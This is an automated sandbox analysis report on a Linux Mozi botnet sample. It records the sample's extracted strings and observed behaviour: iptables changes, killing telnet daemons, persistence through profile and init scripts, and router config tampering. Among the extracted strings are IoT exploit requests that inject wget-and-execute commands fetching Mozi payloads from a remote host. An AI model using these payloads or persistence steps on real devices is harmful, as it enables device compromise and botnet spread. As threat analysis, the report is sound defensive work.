                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: MGuvcs6Ocz, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4637)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4674)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4715)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4758)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4795)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4898)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4918)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4921)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4949)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4975)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4999)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5051)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5077)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5103)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5124)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5128)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5131)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5142)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5167)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5220)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5223)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5236)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5267)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5295)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5299)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5309)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5337)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /proc/4599/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/profile.d/bash_completion.shJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4603)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/4290/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/4601/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/9/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/20/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/21/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/22/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/23/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/24/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/25/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/28/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/29/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1363/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3541/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3541/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1362/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/496/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/496/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/30/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/31/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/31/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1119/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3790/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3791/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3310/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3431/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3431/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3550/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/260/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/263/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/264/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/385/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/144/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/386/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/145/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/146/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3546/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3546/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/147/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3303/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3545/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/148/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/149/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3543/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/822/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/822/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3308/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3308/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3429/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3429/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/47/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/48/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/48/cmdline
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/49/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/150/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/271/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/151/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/152/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/153/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/395/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/396/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/154/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/155/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/156/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/1017/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/157/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/158/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/159/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3432/stat
                Source: /usr/bin/killall (PID: 4603)File opened: /proc/3432/cmdline
                Source: /tmp/MGuvcs6Ocz (PID: 4601)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/MGuvcs6Ocz (PID: 4635)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4669)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4672)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4706)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4733)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4754)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4770)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4787)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 4894)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4912)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4916)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4919)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4923)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/MGuvcs6Ocz (PID: 4930)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/MGuvcs6Ocz (PID: 4940)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4967)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 4990)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5015)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5043)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5067)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5095)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5119)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5126)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5129)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5135)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5159)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/MGuvcs6Ocz (PID: 5218)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5221)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5227)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5257)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5287)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5297)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5302)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"
                Source: /tmp/MGuvcs6Ocz (PID: 5328)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"
                Source: /bin/sh (PID: 4637)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4674)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4715)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4758)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4795)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4898)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4918)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4921)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4949)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4975)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4999)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5051)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5077)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5103)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5124)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5128)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5131)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5142)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5167)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5220)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5223)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5236)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5267)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5295)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5299)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5309)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5337)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
                Source: /tmp/MGuvcs6Ocz (PID: 4626)Reads from proc file: /proc/statJump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File written: /usr/networksJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Drops files in suspicious directoriesShow sources
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/S95baby.shJump to dropped file
